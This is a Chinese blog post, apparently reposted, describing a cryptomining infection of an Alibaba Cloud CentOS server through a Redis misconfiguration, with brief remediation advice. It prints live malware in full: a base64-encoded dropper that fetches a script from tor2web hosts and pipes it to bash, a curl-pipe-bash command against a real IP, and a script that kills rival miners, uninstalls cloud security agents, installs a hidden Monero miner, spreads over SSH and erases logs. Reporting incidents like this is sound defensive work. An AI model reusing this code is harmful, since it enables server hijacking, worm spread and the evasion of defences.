系统相关
首页 > 系统相关> > centos病毒

centos病毒

作者:互联网


#!/bin/bash exec &>/dev/null {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg oUkFORE9NICUgNjAwKSkKKHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJh cGlkN2NwZnFud3hvZG8udG9yMndlYi5pby9jcm9uLnNoIHx8IHdnZXQgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc 2ggfHwgY3VybCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuZnlpL2Nyb24uc2ggfHwgd2dldCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3 hvZG8ub25pb24uc2gvY3Jvbi5zaCB8fCBjdXJsIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uc2gvY3Jvbi5zaCApfGJhc2gK}|{base64,-d}|bash

 事件回顾:阿里云服务器中毒了,接到短信通知

事件说明:云盾基于大数据机器学习检测引擎,检测到您的服务器正在尝试访问一个可疑Host URL,产生该告警的原因可能是该URL很少见; 该指令历史上没被执行过; 或者该URL和恶意软件相关等原因。         检测到服务器上Redis漏洞被黑客利用向磁盘上写入了可疑文件,可能导致黑客直接获取ECS的Root权限。请及时修复Redis配置漏洞 解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件。并及时清理已运行的恶意进程。        按照下列链接进行redis配置漏洞的修复 https://help.aliyun.com/knowledge_detail/37447.html。 https://help.aliyun.com/knowledge_detail/37433.html。 同时删除告警详情中被恶意写入的ssh key文件,防止被黑客重复2次入侵。 渗透命令:/bin/sh -c curl -o- http://121.41.24.142/a7 | bash >/dev/null 2>&1 || true 其中http://121.41.24.142/a7文件内容如下,供大家参考:
  1 #/bin/bash
  2 if [ -f /tmp/.a10 ]; then
  3   exit 101
  4 fi
  5 touch /tmp/.a10
  6 function clean () {
  7   rm -f /tmp/.a10
  8 }
  9 
 10 for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/*crontab /etc/cron.d/*; do 
 11   if grep -i -q redis "$f"; then echo > "$f"; fi
 12 done
 13 
 14 if [ -f /etc/ld.so.preload ]; then
 15   mv -f /etc/ld.so.preload /etc/ld.so.pre
 16 fi
 17 chmod -x /etc/xig
 18 chmod -x /root/cranberry /tmp/cranberry /root/yam
 19 chmod -x /etc/root.sh
 20 chmod -x /usr/bin/gpg-agentd
 21 chmod -x /usr/bin/kworker
 22 chmod -x /usr/local/bin/gpg-agentd
 23 killall -9 xig
 24 killall -9 cranberry
 25 killall -9 root.sh
 26 killall -9 gpg-agentd
 27 killall -9 .gpg-agent
 28 killall -9 xmr-stak
 29 killall -9 kworker
 30 killall -9 .gpg
 31 killall -9 pnscan
 32 killall -9 netfs
 33 killall -9 geth
 34 pkill -f stratum
 35 pkill -f nativesvc
 36 pkill -f cryptonight
 37 pkill -f minerd
 38 pkill -f conn.sh
 39 pkill -f /opt/yilu/
 40 pkill -f /tmp/
 41 pkill -f .cmd
 42 pkill -f kworker
 43 if grep monero7 /etc/x7/pools.txt; then
 44   killall x7
 45   rm -rf /etc/x7
 46 fi
 47 running=
 48 killall x7
 49 #if ps aux | grep '[b]in/x7'; then
 50 #  running=1
 51 #fi
 52 if [ -f /etc/ld.so.pre ]; then
 53   mv -f /etc/ld.so.pre /etc/ld.so.preload
 54 fi
 55 if ! /sbin/iptables -n -L | grep -q 165.225.157.157; then
 56   iptables -A INPUT -s 165.225.157.157 -j DROP
 57   iptables -A OUTPUT -d 165.225.157.157 -j DROP
 58 fi
 59 while read h; do 
 60 if ! grep -q "$h" /etc/hosts; then
 61   echo "$h" >> /etc/hosts
 62 fi
 63 done < <(echo '
 64 0.0.0.0 transfer.sh
 65 0.0.0.0 static.cortins.tk
 66 0.0.0.0 xcn1.yiluzhuanqian.com
 67 0.0.0.0 www.yiluzhuanqian.com
 68 0.0.0.0 xmr.yiluzhuanqian.com
 69 0.0.0.0 xmr.f2pool.com
 70 0.0.0.0 stratum.f2pool.com
 71 0.0.0.0 xmr.crypto-pool.fr
 72 0.0.0.0 jw-js1.ppxxmr.com
 73 0.0.0.0 fr.minexmr.com
 74 0.0.0.0 pool.minexmr.com
 75 0.0.0.0 img.namunil.com
 76 0.0.0.0 cdn.namunil.com
 77 0.0.0.0 chrome.zer0day.ru
 78 0.0.0.0 pool.t00ls.ru
 79 0.0.0.0 monerohash.com
 80 0.0.0.0 z.chakpools.com
 81 ')
 82 if [[ "$running" -eq "1" ]]; then
 83   clean
 84   exit 0
 85 fi
 86 
 87 os=$(egrep -i 'debian|ubuntu|cent' -o -- /etc/issue)
 88 os="${os,,}"
 89 if [ -z "$os" ] && type yum; then os='cent'; fi
 90 if ! grep -q 8.8.8.8 /etc/resolv.conf; then
 91   echo nameserver 8.8.8.8 >> /etc/resolv.conf
 92 fi
 93 if ! grep -q 1.1.1.1 /etc/resolv.conf; then
 94   echo nameserver 1.1.1.1 >> /etc/resolv.conf
 95 fi
 96 
 97 if [ "$os" = 'cent' ]; then
 98   yum install -y at unzip wget bzip2 hwloc-devel openssl openssl-devel
 99 else
100   apt-get update
101   apt-get install -y at unzip wget hwloc
102 fi
103 
104 if ps aux | grep -i '[a]liyun'; then
105     wget http://update.aegis.aliyun.com/download/uninstall.sh
106     chmod +x uninstall.sh
107     ./uninstall.sh
108     wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
109     chmod +x quartz_uninstall.sh
110     ./quartz_uninstall.sh
111     rm -f uninstall.sh quartz_uninstall.sh
112     pkill aliyun-service
113     rm -fr /etc/init.d/agentwatch /usr/sbin/aliyun-service
114     rm -rf /usr/local/aegis*;
115 elif ps aux | grep -i '[y]unjing'; then
116     /usr/local/qcloud/stargate/admin/uninstall.sh
117     /usr/local/qcloud/YunJing/uninst.sh
118     /usr/local/qcloud/monitor/barad/admin/uninstall.sh
119 fi
120 
121 cd /etc; wget --no-check-certificate http://121.41.24.142/${os}.tar.gz -O x7.tar.gz; tar -xvf x7.tar.gz && rm -f x7.tar.gz
122 /sbin/sysctl -w vm.nr_hugepages=128
123 chown -R root:root /etc/x7
124 (cd /etc/x7; nohup nice bin/x7 &)
125 
126 if [ -f /etc/rc.sysinit ]; then
127   if ! grep x7 /etc/rc.sysinit; then sed -i '35i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.sysinit; fi
128 elif [ -f /etc/rc.d/init.d/network ]; then
129   if ! grep x7 /etc/rc.d/init.d/network; then sed -i '64i(cd /etc/x7; nohup nice bin/x7 &)' /etc/rc.d/init.d/network; fi
130 elif [ -f /etc/init.d/networking ]; then
131   if ! grep x7 /etc/init.d/networking; then sed -i '130i(cd /etc/x7; nohup nice bin/x7 &)' /etc/init.d/networking; fi
132 fi
133 
134 wget --no-check-certificate https://github.com/gianlucaborello/libprocesshider/archive/master.zip -O master.zip && unzip master.zip && rm -f master.zip && cd libprocesshider-master;
135 sed -i 's/evil_script.py/x7/' processhider.c
136 make && mv libprocesshider.so /usr/local/lib/libjdk.so && echo /usr/local/lib/libjdk.so >> /etc/ld.so.preload && cd .. && rm -rf libprocesshider-master
137 
138 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
139   for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  http://112.74.182.220/a7 | bash >/dev/null 2>&1 &' & done
140 fi
141 
142 touch -r /etc/sudoers /etc/x7 /etc/ld.so.preload /etc/hosts
143 echo "echo | tee /var/log/cron /var/spool/mail/root /var/mail/root" | at now + 1 minutes
144 
145 clean
146 history -c
147 exit 0

 

服务器现象:服务器CPU突增,且.ssh/authorized_keys被写入恶意信息,文件也被加上了特殊权限i,禁止root权限删除该文件

 

 解决:修复redis漏洞,取消i权限并清空authorized_keys文件,防止二次入侵

标签:centos,etc,sh,killall,fi,root,x7,病毒
来源: https://www.cnblogs.com/abkn/p/10650355.html